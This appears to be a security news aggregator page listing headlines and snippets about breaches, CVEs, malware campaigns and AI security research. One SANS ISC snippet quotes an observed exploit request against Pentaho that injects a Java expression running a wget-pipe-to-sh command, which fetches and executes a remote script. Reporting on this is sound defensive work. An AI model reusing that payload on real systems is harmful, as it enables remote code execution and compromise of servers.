no alarms and no surprises please..
-
Microsoft Warns of Security Risks in New Agentic AI Feature
Microsoft Warns of Security Risks in New Agentic AI Feature Microsoft is sounding the alarm on critical security considerations as it introduces agentic AI capabilities to Windows through experimental features like Copilot Actions. The… Go to gbhackers.com
-
Russian and North Korean Hackers Forge Global Cyberattack Alliance
Russian and North Korean Hackers Forge Global Cyberattack Alliance State-sponsored hackers from Russia and North Korea are collaborating on shared infrastructure, marking a significant shift in cyber geopolitics. Security researchers have uncovered evidence… Go to gbhackers.com
-
Major Data Breach at Delta Dental of Virginia Hits Over 146,000 Customers’ Info
Major Data Breach at Delta Dental of Virginia Hits Over 146,000 Customers’ Info Delta Dental of Virginia, a non-profit dental benefits organization based in Roanoke, has announced a significant data breach affecting approximately 145,918 individuals. The unauthorised… Go to gbhackers.com
-
OnSolve CodeRED cyberattack disrupts emergency alert systems nationwide
OnSolve CodeRED cyberattack disrupts emergency alert systems nationwide Risk management company Crisis24 has confirmed its OnSolve CodeRED platform suffered a cyberattack that disrupted emergency notification systems used by state and local governments, police departments, and fire agencies across the United States. […] Lawrence Abrams Go to bleepingcomputer
-
The Black Friday 2025 Cybersecurity, IT, VPN, & Antivirus Deals
The Black Friday 2025 Cybersecurity, IT, VPN, & Antivirus Deals Black Friday 2025 is almost here, and early deals are already live across security software, online courses, system administration tools, antivirus products, and VPN services. These discounts are limited-time offers and vary by provider, so if you see something that fits your needs, it’s best…
-
FBI: Cybercriminals stole $262M by impersonating bank support teams
FBI: Cybercriminals stole $262M by impersonating bank support teams The FBI warns of a surge in account takeover (ATO) fraud schemes and says that cybercriminals impersonating various financial institutions have stolen over $262 million in ATO attacks since the start of the year. […] Sergiu Gatlan Go to bleepingcomputer
-
Tor switches to new Counter Galois Onion relay encryption algorithm
Tor switches to new Counter Galois Onion relay encryption algorithm Tor has announced improved encryption and security for the circuit traffic by replacing the old tor1 relay encryption algorithm with a new design called Counter Galois Onion (CGO). […] Bill Toulas Go to bleepingcomputer
-
Microsoft: Exchange Online outage blocks access to Outlook mailboxes
Microsoft: Exchange Online outage blocks access to Outlook mailboxes Microsoft is investigating an Exchange Online service outage that is preventing customers from accessing their mailboxes using the classic Outlook desktop client. […] Sergiu Gatlan Go to bleepingcomputer
-
HashJack: New Attack Technique Tricks AI Browsers Using a Simple ‘#’
HashJack: New Attack Technique Tricks AI Browsers Using a Simple ‘#’ Security researchers at Cato CTRL have discovered a new indirect prompt injection technique called HashJack, which weaponises legitimate websites to manipulate AI browser assistants. The attack conceals malicious instructions after the “#” symbol within trusted URLs, enabling threat actors to conduct a wide range of…
-
Tor Adopts Galois Onion Encryption to Strengthen Defense Against Online Attacks
Tor Adopts Galois Onion Encryption to Strengthen Defense Against Online Attacks The Tor Project has announced a significant cryptographic overhaul, retiring its legacy relay encryption algorithm after decades of service and replacing it with Counter Galois Onion (CGO). This research-backed encryption design defends against a broader class of sophisticated online attackers. Tor’s relay encryption serves…
-
Microsoft Teams Introduces New Feature to Boost Performance and Startup Speed
Microsoft Teams Introduces New Feature to Boost Performance and Startup Speed Microsoft has announced a significant update to the Teams Desktop Client for Windows that aims to enhance performance and reduce startup times for calling features. The update, detailed in the Message Center notification MC1189656 published on November 25, 2025, introduces a new process architecture…
-
ASUS MyASUS Flaw Lets Hackers Escalate to SYSTEM-Level Access
ASUS MyASUS Flaw Lets Hackers Escalate to SYSTEM-Level Access ASUS has disclosed a high security vulnerability in its MyASUS application that could allow local attackers to escalate their privileges to SYSTEM-level access on affected Windows devices. The flaw, tracked as CVE-2025-59373, carries a high-severity CVSS 4.0 score of 8.5, indicating a significant risk to millions…
-
YAMAGoya – Real-Time Threat Monitoring Tool Using Sigma and YARA Rules
YAMAGoya – Real-Time Threat Monitoring Tool Using Sigma and YARA Rules Modern cybersecurity faces an escalating challenge: fileless malware and obfuscation techniques increasingly bypass traditional file-based detection methods. To address this growing threat, JPCERT/CC has released YAMAGoya. This open-source threat hunting tool leverages industry-standard detection rules to identify suspicious activity in real time. YAMAGoya represents…
-
MDR is the answer – now, what’s the question?
MDR is the answer – now, what’s the question? Why your business needs the best-of-breed combination of technology and human expertise Go to eset
-
TR-25-0411 (WordPress Eklenti Güvenlik Bildirimi)
TR-25-0411 (WordPress Eklenti Güvenlik Bildirimi) Go to usom.gov
-
FBI Reports $262M in ATO Fraud as Researchers Cite Growing AI Phishing and Holiday Scams
FBI Reports $262M in ATO Fraud as Researchers Cite Growing AI Phishing and Holiday Scams The U.S. Federal Bureau of Investigation (FBI) has warned that cybercriminals are impersonating financial institutions with an aim to steal money or sensitive information to facilitate account takeover (ATO) fraud schemes. The activity targets individuals, businesses, and organizations of varied…
-
Years of JSONFormatter and CodeBeautify Leaks Expose Thousands of Passwords and API Keys
Years of JSONFormatter and CodeBeautify Leaks Expose Thousands of Passwords and API Keys New research has found that organizations in various sensitive sectors, including governments, telecoms, and critical infrastructure, are pasting passwords and credentials into online tools like JSONformatter and CodeBeautify that are used to format and validate code. Cybersecurity company watchTowr Labs said it…
-
JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers
JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers Cybersecurity researchers are calling attention to a new campaign that’s leveraging a combination of ClickFix lures and fake adult websites to deceive users into running malicious commands under the guise of a “critical” Windows security update. “Campaign leverages fake adult websites (xHamster,…
-
ToddyCat’s New Hacking Tools Steal Outlook Emails and Microsoft 365 Access Tokens
ToddyCat’s New Hacking Tools Steal Outlook Emails and Microsoft 365 Access Tokens The threat actor known as ToddyCat has been observed adopting new methods to obtain access to corporate email data belonging to target companies, including using a custom tool dubbed TCSectorCopy. “This attack allows them to obtain tokens for the OAuth 2.0 authorization protocol…
-
3 SOC Challenges You Need to Solve Before 2026
3 SOC Challenges You Need to Solve Before 2026 2026 will mark a pivotal shift in cybersecurity. Threat actors are moving from experimenting with AI to making it their primary weapon, using it to scale attacks, automate reconnaissance, and craft hyper-realistic social engineering campaigns. The Storm on the Horizon Global world instability, coupled with rapid…
-
Iran Exploits Cyber Domain to Aid Kinetic Strikes
Iran Exploits Cyber Domain to Aid Kinetic Strikes The country deploys “cyber-enabled kinetic targeting” prior to — and following — real-world missile attacks against ships and land-based targets. Robert Lemos, Contributing Writer Go to gbhackers.com
-
Four Ways AI Is Being Used to Strengthen Democracies Worldwide
Four Ways AI Is Being Used to Strengthen Democracies Worldwide Democracy is colliding with the technologies of artificial intelligence. Judging from the audience reaction at the recent World Forum on Democracy in Strasbourg, the general expectation is that democracy will be the worse for it. We have another narrative. Yes, there are risks to democracy…
-
ISC Stormcast For Wednesday, November 26th, 2025 https://isc.sans.edu/podcastdetail/9716, (Wed, Nov 26th)
ISC Stormcast For Wednesday, November 26th, 2025 https://isc.sans.edu/podcastdetail/9716, (Wed, Nov 26th) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Go to isc.sans.edu
-
The AI Fix #78: The big AI bubble, and robot Grandma in the cloud
The AI Fix #78: The big AI bubble, and robot Grandma in the cloud In episode 78 of The AI Fix, alien robot spiders invade Antarctica (or Facebook says they do), Mark prepares humanity for AI-powered fighter jets with loyalty issues, and Graham tries to work out why his AI-generated country music career hasn’t yet…
-
Operation Endgame disrupts Rhadamanthys information-stealing malware
Operation Endgame disrupts Rhadamanthys information-stealing malware International cybercrime-fighting agencies, co-ordinated by Europol, took down over 1000 servers and seized 20 domains earlier this month as part of Operation Endgame 3.0. Their target? Three major malware platforms: the infostealer known as Rhadamanthys, the VenomRAT remote access trojan, and the Elysium botnet. Read more in my article…
-
Advanced Security Isn’t Stopping Ancient Phishing Tactics
Advanced Security Isn’t Stopping Ancient Phishing Tactics New research reveals that sophisticated phishing attacks consistently bypass traditional enterprise security measures. Kristina Beek Go to gbhackers.com
-
With Friends Like These: China Spies on Russian IT Orgs
With Friends Like These: China Spies on Russian IT Orgs State-linked hackers stayed under the radar by using a variety of commercial cloud services for command-and-control communications. Nate Nelson, Contributing Writer Go to gbhackers.com
-
‘JackFix’ Attack Circumvents ClickFix Mitigations
‘JackFix’ Attack Circumvents ClickFix Mitigations A new ClickFix variant ratchets up the psychological pressure to 100 and addresses some technical mitigations to classic ClickFix attacks. Nate Nelson, Contributing Writer Go to gbhackers.com
-
Zapier’s NPM Account Hacked, Multiple Packages Infected with Malware
Zapier’s NPM Account Hacked, Multiple Packages Infected with Malware Zapier’s NPM account has been successfully compromised, leading to the injection of the Shai Hulud malware into 425 packages currently distributed across the npm… Go to gbhackers.com
-
Linux 6.18-rc7 Released With New Bug Fixes and Driver Updates
Linux 6.18-rc7 Released With New Bug Fixes and Driver Updates The Linux kernel development team has released version 6.18-rc7, marking another step toward the final 6.18 release expected next weekend. According to kernel maintainer… Go to gbhackers.com
-
LLMs Tools Like GPT-3.5-Turbo and GPT-4 Fuel the Development of Fully Autonomous Malware
LLMs Tools Like GPT-3.5-Turbo and GPT-4 Fuel the Development of Fully Autonomous Malware The rapid proliferation of large language models has transformed how organizations approach automation, coding, and research. Yet this technological advancement presents a double-edged sword:… Go to gbhackers.com
-
Iberia Airlines Hit by Data Breach Exposing Customer Personal Details
Iberia Airlines Hit by Data Breach Exposing Customer Personal Details Iberia Líneas Aéreas de España has disclosed a significant security incident involving unauthorized access to systems operated by an external service provider. The breach… Go to gbhackers.com
-
PoC Published for W3 Total Cache Flaw Exposing 1M+ Sites to RCE
PoC Published for W3 Total Cache Flaw Exposing 1M+ Sites to RCE Security researchers have published a proof-of-concept exploit for a critical remote code execution vulnerability in W3 Total Cache, one of WordPress’s most popular caching… Go to gbhackers.com
-
Malicious Blender model files deliver StealC infostealing malware
Malicious Blender model files deliver StealC infostealing malware A Russian-linked campaign delivers the StealC V2 information stealer malware through malicious Blender files uploaded to 3D model marketplaces like CGTrader. […] Bill Toulas Go to bleepingcomputer
-
ClickFix attack uses fake Windows Update screen to push malware
ClickFix attack uses fake Windows Update screen to push malware New ClickFix attack variants have been observed where threat actors trick users with a realistic-looking Windows Update animation in a full-screen browser page and hide the malicious code inside images. […] Bill Toulas Go to bleepingcomputer
-
Real-estate finance services giant SitusAMC breach exposes client data
Real-estate finance services giant SitusAMC breach exposes client data SitusAMC, a company that provides back-end services for top banks and lenders, disclosed on Saturday a data breach it had discovered earlier this month that impacted customer data. […] Bill Toulas Go to bleepingcomputer
-
SCCM and WSUS in a Hybrid World: Why It’s Time for Cloud-native Patching
SCCM and WSUS in a Hybrid World: Why It’s Time for Cloud-native Patching Hybrid work exposes the limits of SCCM and WSUS, with remote devices often missing updates and WSUS now deprecated. Action1’s cloud-native patching keeps devices updated from any location, strengthening compliance and security. […] Sponsored by Action1 Go to bleepingcomputer
-
Shai-Hulud malware infects 500 npm packages, leaks secrets on GitHub
Shai-Hulud malware infects 500 npm packages, leaks secrets on GitHub Hundreds of trojanized versions of well-known packages such as Zapier, ENS Domains, PostHog, and Postman have been planted in the npm registry in a new Shai-Hulud supply-chain campaign. […] Bill Toulas Go to bleepingcomputer
-
Canon Allegedly Breached by Clop Ransomware via Oracle E-Business Suite 0-Day Hack
Canon Allegedly Breached by Clop Ransomware via Oracle E-Business Suite 0-Day Hack Canon has officially confirmed that it was targeted during the widespread hacking campaign exploiting a critical zero-day vulnerability in Oracle E-Business Suite (EBS). The attack, orchestrated by the notorious Clop ransomware gang, has impacted dozens of major organizations worldwide. The group listed Canon…
-
HashiCorp Vault Vulnerability Allow Attackers to Authenticate to Vault Without Valid Credentials
HashiCorp Vault Vulnerability Allow Attackers to Authenticate to Vault Without Valid Credentials A critical security flaw has been discovered in HashiCorp’s Vault Terraform Provider that could allow attackers to bypass authentication and access Vault without valid credentials. The vulnerability, tracked as CVE-2025-13357, affects organizations using LDAP authentication with Vault. The security issue stems from an…
-
Microsoft’s Update Health Tools Configuration Vulnerability Let Attackers Execute Arbitrary Code Remotely
Microsoft’s Update Health Tools Configuration Vulnerability Let Attackers Execute Arbitrary Code Remotely A critical remote code execution (RCE) vulnerability in Microsoft’s Update Health Tools (KB4023057). A widely deployed Windows component designed to expedite security updates through Intune. The flaw stems from the tool connecting to dropped Azure Blob storage accounts that attackers could register and control. How…
-
Top 10 Best Exposure Management Tools In 2026
Top 10 Best Exposure Management Tools In 2026 Exposure Management is a proactive cybersecurity discipline that systematically identifies, assesses, prioritizes, and remediates security vulnerabilities and misconfigurations across an organization’s entire attack surface both internal and external. Unlike traditional, periodic vulnerability scanning, EM leverages continuous monitoring, threat intelligence, and a holistic, graph-based view of risk to…
-
ClickFix Attack Uses Steganography to Hide Malicious Code in Fake Windows Security Update Screen
ClickFix Attack Uses Steganography to Hide Malicious Code in Fake Windows Security Update Screen A new wave of ClickFix attacks is abusing highly realistic fake Windows Update screens and PNG image steganography to secretly deploy infostealing malware such as LummaC2 and Rhadamanthys on victim systems. The campaigns rely on tricking users into manually running a…
-
TR-25-0410 (WordPress Eklenti Güvenlik Bildirimi)
TR-25-0410 (WordPress Eklenti Güvenlik Bildirimi) Go to usom.gov
-
TR-25-0409 (Grafana Güvenlik Bildirimi)
TR-25-0409 (Grafana Güvenlik Bildirimi) Go to usom.gov
-
CISA Warns of Active Spyware Campaigns Hijacking High-Value Signal and WhatsApp Users
CISA Warns of Active Spyware Campaigns Hijacking High-Value Signal and WhatsApp Users The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday issued an alert warning of bad actors actively leveraging commercial spyware and remote access trojans (RATs) to target users of mobile messaging applications. “These cyber actors use sophisticated targeting and social engineering techniques…
-
New Fluent Bit Flaws Expose Cloud to RCE and Stealthy Infrastructure Intrusions
New Fluent Bit Flaws Expose Cloud to RCE and Stealthy Infrastructure Intrusions Cybersecurity researchers have discovered five vulnerabilities in Fluent Bit, an open-source and lightweight telemetry agent, that could be chained to compromise and take over cloud infrastructures. The security defects “allow attackers to bypass authentication, perform path traversal, achieve remote code execution, cause denial-of-service…
-
Second Sha1-Hulud Wave Affects 25,000+ Repositories via npm Preinstall Credential Theft
Second Sha1-Hulud Wave Affects 25,000+ Repositories via npm Preinstall Credential Theft Multiple security vendors are sounding the alarm about a second wave of attacks targeting the npm registry in a manner that’s reminiscent of the Shai-Hulud attack. The new supply chain campaign, dubbed Sha1-Hulud, has compromised hundreds of npm packages, according to reports from Aikido,…
-
⚡ Weekly Recap: Fortinet Exploit, Chrome 0-Day, BadIIS Malware, Record DDoS, SaaS Breach & More
⚡ Weekly Recap: Fortinet Exploit, Chrome 0-Day, BadIIS Malware, Record DDoS, SaaS Breach & More This week saw a lot of new cyber trouble. Hackers hit Fortinet and Chrome with new 0-day bugs. They also broke into supply chains and SaaS tools. Many hid inside trusted apps, browser alerts, and software updates. Big firms like…
-
Chinese DeepSeek-R1 AI Generates Insecure Code When Prompts Mention Tibet or Uyghurs
Chinese DeepSeek-R1 AI Generates Insecure Code When Prompts Mention Tibet or Uyghurs New research from CrowdStrike has revealed that DeepSeek’s artificial intelligence (AI) reasoning model DeepSeek-R1 produces more security vulnerabilities in response to prompts that contain topics deemed politically sensitive by China. “We found that when DeepSeek-R1 receives prompts containing topics the Chinese Communist Party…
-
IACR Nullifies Election Because of Lost Decryption Key
IACR Nullifies Election Because of Lost Decryption Key The International Association of Cryptologic Research—the academic cryptography association that’s been putting conferences like Crypto (back when “crypto” meant “cryptography”) and Eurocrypt since the 1980s—had to nullify an online election when trustee Moti Yung lost his decryption key. For this election and in accordance with the bylaws…
-
ISC Stormcast For Tuesday, November 25th, 2025 https://isc.sans.edu/podcastdetail/9714, (Tue, Nov 25th)
ISC Stormcast For Tuesday, November 25th, 2025 https://isc.sans.edu/podcastdetail/9714, (Tue, Nov 25th) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Go to isc.sans.edu
-
Conflicts between URL mapping and URL based access control., (Mon, Nov 24th)
Conflicts between URL mapping and URL based access control., (Mon, Nov 24th) We continue to encounter high-profile vulnerabilities related to the use of URL mapping (or “aliases”) with URL-based access control. Last week, we wrote about the Oracle Identity Manager vulnerability. I noticed some scans for an older vulnerability with similar roots today: /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23%7BT(java.lang.Runtime).getRuntime().exec(‘wget%20-qO-%20http%3A%2F%2F[redacted]%2Frondo.pms.sh%7Csh’)%7D&mgrDn=a&pwd=a This request…
-
Is Your Android TV Streaming Box Part of a Botnet?
Is Your Android TV Streaming Box Part of a Botnet? On the surface, the Superbox media streaming devices for sale at retailers like BestBuy and Walmart may seem like a steal: They offer unlimited access to more than 2,200 pay-per-view and streaming services like Netflix, ESPN and Hulu, all for a one-time fee of around…
-
ShadowRay 2.0 Turns AI Clusters into Crypto Botnets
ShadowRay 2.0 Turns AI Clusters into Crypto Botnets A threat actor is leveraging a flaw in the Ray framework to hijack AI infrastructure worldwide and distribute a self-propagating cryptomining and data theft botnet. Jai Vijayan, Contributing Writer Go to gbhackers.com
-
Critical Flaw in Oracle Identity Manager Under Exploitation
Critical Flaw in Oracle Identity Manager Under Exploitation The exploitation of CVE-2025-61757 follows a breach of Oracle Cloud earlier this year as well as a recent extortion campaign targeting Oracle E-Business Suite customers. Rob Wright Go to gbhackers.com
-
Infamous Shai-hulud Worm Resurfaces From the Depths
Infamous Shai-hulud Worm Resurfaces From the Depths This campaign introduces a new variant that executes malicious code during preinstall, significantly increasing potential exposure in build and runtime environments, researchers said. Alexander Culafi Go to gbhackers.com
-
Vision Language Models Keep an Eye on Physical Security
Vision Language Models Keep an Eye on Physical Security Advancements in vision language models expanded models reasoning capabilities to help protect employee safety. Arielle Waldman Go to gbhackers.com
-
Google enables Pixel-to-iPhone file sharing via Quick Share, AirDrop
Google enables Pixel-to-iPhone file sharing via Quick Share, AirDrop Google has added interoperability support between Android Quick Share and Apple AirDrop, to let users share files between Pixel devices and iPhones. […] Bill Toulas Go to bleepingcomputer
-
Enterprise password security and secrets management with Passwork 7
Enterprise password security and secrets management with Passwork 7 Passwork 7 unifies enterprise password and secrets management in a self-hosted platform. Organizations can automate credential workflows and test the full system with a free trial and up to 50% Black Friday savings. […] Sponsored by Passwork Go to bleepingcomputer
-
Iberia discloses customer data leak after vendor security breach
Iberia discloses customer data leak after vendor security breach Spanish flag carrier Iberia has begun notifying customers of a data security incident stemming from a compromise at one of its suppliers. The disclosure comes days after a threat actor claimed on hacker forums to have access to 77 GB of data allegedly stolen from the…
-
New Costco Gold Star Members also get a $40 Digital Costco Shop Card
New Costco Gold Star Members also get a $40 Digital Costco Shop Card The holidays can be hard on any budget, but there may be a way to make it a little easier. Instead of dashing through the snow all around town, get all your shopping done under one roof at Costco. Right now, you…
-
Beware of North Korean Fake Job Platform Targeting U.S. Based AI-Developers
Beware of North Korean Fake Job Platform Targeting U.S. Based AI-Developers A sophisticated recruitment scam linked to North Korea has emerged, targeting American artificial intelligence developers, software engineers, and cryptocurrency professionals through an elaborate fake job platform. Validin security researchers have uncovered a new variant of what they call the “Contagious Interview” operation, designed to…
-
DeepSeek-R1 Makes Code for Prompts With Severe Security Vulnerabilities
DeepSeek-R1 Makes Code for Prompts With Severe Security Vulnerabilities A concerning vulnerability in DeepSeek-R1, a Chinese-developed artificial intelligence coding assistant. When the AI model encounters politically sensitive topics related to the Chinese Communist Party, it produces code with severe security flaws at rates up to 50% higher than usual. Released in January 2025 by Chinese…
-
Wireshark Vulnerabilities Let Attackers Crash by Injecting a Malformed Packet
Wireshark Vulnerabilities Let Attackers Crash by Injecting a Malformed Packet The Wireshark Foundation has rolled out a crucial security update for its widely used network protocol analyzer, addressing multiple vulnerabilities that could lead to denial-of-service conditions. The latest release, version 4.6.1, specifically targets flaws discovered in the Bundle Protocol version 7 (BPv7) and Kafka dissectors.…
-
CISA Warns of Oracle’s Identity Manager RCE Vulnerability Actively Exploited in Attacks
CISA Warns of Oracle’s Identity Manager RCE Vulnerability Actively Exploited in Attacks The Cybersecurity and Infrastructure Security Agency (CISA) is urging organizations to immediately address a critical security flaw in Oracle Identity Manager following reports of active exploitation. The vulnerability, tracked as CVE-2025-61757, allows unauthenticated remote attackers to execute arbitrary code on affected systems, posing…
-
ISC Stormcast For Monday, November 24th, 2025 https://isc.sans.edu/podcastdetail/9712, (Mon, Nov 24th)
ISC Stormcast For Monday, November 24th, 2025 https://isc.sans.edu/podcastdetail/9712, (Mon, Nov 24th) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Go to isc.sans.edu
-
YARA-X 1.10.0 Release: Fix Warnings, (Sun, Nov 23rd)
YARA-X 1.10.0 Release: Fix Warnings, (Sun, Nov 23rd) YARA-X’s 1.10.0 release brings a new command: fix warnings. If you have a rule that would generate a warning with a help section (explaining how to fix it), like this example rule: rule FixableCountWarning { strings: $a1 = “malicious” $a2 = “badstuff” condition: 0 of ($a*)…
-
Wireshark 4.4.1 Released, (Sun, Nov 23rd)
Wireshark 4.4.1 Released, (Sun, Nov 23rd) Wireshark release 4.6.1 fixes 2 vulnerabilities and 20 bugs. Didier Stevens Senior handler blog.DidierStevens.com (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Go to isc.sans.edu
-
Weekly Update 479
Weekly Update 479 I gave up on the IoT water meter reader. Being technical and thinking you can solve everything with technology is both a blessing and a curse; dogged persistence has given me the life I have today, but it has also burned serious amounts of time because I never want to let a…
-
CISA Issues Warning as Hackers Target Oracle Identity Manager RCE Flaw
CISA Issues Warning as Hackers Target Oracle Identity Manager RCE Flaw The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a new Oracle vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, warning that attackers… Go to gbhackers.com
-
Hackers Use Salesforce Gainsight Breach to Access Data from More Than 200 Companies
Hackers Use Salesforce Gainsight Breach to Access Data from More Than 200 Companies Salesforce has disclosed a significant security incident involving unauthorized access to customer data through compromised Gainsight-published applications. The breach, detected in mid-November 2025, potentially… Go to gbhackers.com
-
CrowdStrike Fires Employee for Leaking Internal System Info to Hackers
CrowdStrike Fires Employee for Leaking Internal System Info to Hackers Cybersecurity giant CrowdStrike has terminated an employee who allegedly shared sensitive internal system information with a notorious hacking collective. The incident involved the leak… Go to gbhackers.com
-
Metasploit Releases New Exploit for Fresh FortiWeb 0-Day Vulnerabilities
Metasploit Releases New Exploit for Fresh FortiWeb 0-Day Vulnerabilities Rapid7’s Metasploit team has released a new exploit module targeting critical zero-day vulnerabilities in Fortinet’s FortiWeb web application firewall, chaining two security flaws to… Go to gbhackers.com
-
WhatsApp API flaw let researchers scrape 3.5 billion accounts
WhatsApp API flaw let researchers scrape 3.5 billion accounts Researchers compiled a list of 3.5 billion WhatsApp mobile phone numbers and associated personal information by abusing a contact-discovery API that lacked rate limiting. […] Lawrence Abrams Go to bleepingcomputer
-
Cox Enterprises discloses Oracle E-Business Suite data breach
Cox Enterprises discloses Oracle E-Business Suite data breach Cox Enterprises is notifying impacted individuals of a data breach that exposed their personal data to hackers who breached the company network after exploiting a zero-day flaw in Oracle E-Business Suite. […] Bill Toulas Go to bleepingcomputer
-
Piecing Together the Puzzle: A Qilin Ransomware Investigation
Piecing Together the Puzzle: A Qilin Ransomware Investigation Huntress analysts reconstructed a Qilin ransomware attack from a single endpoint, using limited logs to reveal rogue ScreenConnect access, failed infostealer attempts, and the ransomware execution path. The investigation shows how validating multiple data sources can uncover activity even when visibility is reduced to a “pinhole.” […]…
-
Microsoft Confirms Windows 11 24H2 Update Broken Multiple Core Features
Microsoft Confirms Windows 11 24H2 Update Broken Multiple Core Features Microsoft has officially acknowledged a significant disruption affecting Windows 11 version 24H2 users, specifically after installing the cumulative update KB5062553 released in July 2025. The issue primarily affects environments using Virtual Desktop Infrastructure (VDI) and devices undergoing their first user logon. Reports indicate that essential…
-
15 Best Remote Monitoring Tools – 2025
15 Best Remote Monitoring Tools – 2025 Remote monitoring tools are essential for managing and maintaining the health and performance of IT infrastructure and systems. Remote monitoring tools provide continuous oversight of network devices, servers, applications, and other critical components from a remote location. These tools help identify and resolve issues proactively by offering real-time…
-
ShinyHunters Claims Data Theft from 200+ Companies via Salesforce Gainsight Breach
ShinyHunters Claims Data Theft from 200+ Companies via Salesforce Gainsight Breach A sophisticated supply chain attack has reportedly compromised data across hundreds of organizations, linking the breach to a critical integration between customer success platform Gainsight and CRM giant Salesforce. The notorious hacking collective ShinyHunters is claiming responsibility for the intrusion, which allegedly affects over…
-
China-Linked APT31 Launches Stealthy Cyberattacks on Russian IT Using Cloud Services
China-Linked APT31 Launches Stealthy Cyberattacks on Russian IT Using Cloud Services The China-linked advanced persistent threat (APT) group known as APT31 has been attributed to cyber attacks targeting the Russian information technology (IT) sector between 2024 and 2025 while staying undetected for extended periods of time. “In the period from 2024 to 2025, the Russian…
-
Matrix Push C2 Uses Browser Notifications for Fileless, Cross-Platform Phishing Attacks
Matrix Push C2 Uses Browser Notifications for Fileless, Cross-Platform Phishing Attacks Bad actors are leveraging browser notifications as a vector for phishing attacks to distribute malicious links by means of a new command-and-control (C2) platform called Matrix Push C2. “This browser-native, fileless framework leverages push notifications, fake alerts, and link redirects to target victims across…
-
CISA Warns of Actively Exploited Critical Oracle Identity Manager Zero-Day Vulnerability
CISA Warns of Actively Exploited Critical Oracle Identity Manager Zero-Day Vulnerability The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a critical security flaw impacting Oracle Identity Manager to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The vulnerability in question is CVE-2025-61757 (CVSS score: 9.8), a case of missing…
-
Critical Azure Bastion Vulnerability Lets Attackers Bypass Login and Gain Higher Privileges
Critical Azure Bastion Vulnerability Lets Attackers Bypass Login and Gain Higher Privileges Microsoft disclosed a critical authentication bypass vulnerability in Azure Bastion, its managed remote access service, enabling attackers to escalate privileges to administrative levels with… Go to gbhackers.com
-
Xillen Stealer: Advanced Features Bypass AI Detection and Steal Password Manager Data
Xillen Stealer: Advanced Features Bypass AI Detection and Steal Password Manager Data The Python-based information-stealing tool Xillen Stealer has reached versions 4 and 5, significantly expanding its targeting capabilities and functionality across platforms. Documented initially by… Go to gbhackers.com
-
AI-Driven Obfuscated Malicious Apps Bypassing Antivirus Detection to Deliver Malicious Payloads
AI-Driven Obfuscated Malicious Apps Bypassing Antivirus Detection to Deliver Malicious Payloads Cybersecurity researchers have identified a sophisticated malware campaign leveraging artificial intelligence to enhance obfuscation techniques, enabling malicious applications to circumvent traditional antivirus detection systems…. Go to gbhackers.com
-
Dark Web Job Market Evolved – Prioritizes Practical Skills Over Formal Education
Dark Web Job Market Evolved – Prioritizes Practical Skills Over Formal Education The underground labor market has undergone a significant transformation. According to new research analyzing 2,225 job-related posts collected from shadow forums between January 2023… Go to gbhackers.com
-
North Korean Kimsuky and Lazarus Teams Target Critical Sectors with Zero-Day Exploits
North Korean Kimsuky and Lazarus Teams Target Critical Sectors with Zero-Day Exploits North Korea’s two most formidable APT groups Kimsuky and Lazarus have established a coordinated operational framework that combines intelligence gathering with large-scale cryptocurrency theft…. Go to gbhackers.com
-
CISA warns Oracle Identity Manager RCE flaw is being actively exploited
CISA warns Oracle Identity Manager RCE flaw is being actively exploited The U.S. Cybersecurity & Infrastructure Security Agency (CISA) is warning government agencies to patch an Oracle Identity Manager tracked as CVE-2025-61757 that has been exploited in attacks, potentially as a zero-day. […] Lawrence Abrams Go to bleepingcomputer
-
Nvidia confirms October Windows updates cause gaming issues
Nvidia confirms October Windows updates cause gaming issues Nvidia has confirmed that last month’s security updates are causing gaming performance issues on Windows 11 24H2 and Windows 11 25H2 systems. […] Sergiu Gatlan Go to bleepingcomputer
-
Microsoft: Out-of-band update fixes Windows 11 hotpatch install loop
Microsoft: Out-of-band update fixes Windows 11 hotpatch install loop Microsoft has released an out-of-band cumulative update to fix a known issue causing the November 2025 KB5068966 hotpatch update to reinstall on Windows 11 systems repeatedly. […] Sergiu Gatlan Go to bleepingcomputer
-
Grafana warns of max severity admin spoofing vulnerability
Grafana warns of max severity admin spoofing vulnerability Grafana Labs is warning of a maximum severity vulnerability (CVE-2025-41115) in its Enterprise product that can be exploited to treat new users as administrators or for privilege escalation. […] Bill Toulas Go to bleepingcomputer
-
CrowdStrike catches insider feeding information to hackers
CrowdStrike catches insider feeding information to hackers American cybersecurity firm CrowdStrike has confirmed that an insider shared screenshots taken on internal systems with hackers after they were leaked on Telegram by the Scattered Lapsus$ Hunters threat actors. […] Sergiu Gatlan Go to bleepingcomputer
-
Metasploit Adds Exploit Module for Recently Disclosed FortiWeb 0-Day Vulnerabilities
Metasploit Adds Exploit Module for Recently Disclosed FortiWeb 0-Day Vulnerabilities The Metasploit Framework has introduced a new exploit module targeting critical vulnerabilities in Fortinet’s FortiWeb Web Application Firewall (WAF). This module chains two recently disclosed flaws, CVE-2025-64446 and CVE-2025-58034, to achieve unauthenticated Remote Code Execution (RCE) with root privileges. The release follows reports of active exploitation in the wild,…
-
Fired Techie Admits Hacking Employer’s Network in Retaliation for Termination
Fired Techie Admits Hacking Employer’s Network in Retaliation for Termination A former IT contractor from Ohio has admitted to launching a cyberattack against his employer’s network in retaliation for being terminated, federal prosecutors announced this week. Maxwell Schultz, 35, of Columbus, Ohio, pleaded guilty to computer fraud charges after leading a technical attack that locked thousands…
-
CrowdStrike Fires Insider for Sharing Internal System Details with Hackers
CrowdStrike Fires Insider for Sharing Internal System Details with Hackers Cybersecurity giant CrowdStrike has confirmed the termination of an insider who allegedly provided sensitive internal system details to a notorious hacking collective. The incident, which came to light late Thursday and Friday morning, involved the leak of internal screenshots on a public Telegram channel operated…
-
Phishing Breaks More Defenses Than Ever. Here’s the Fix
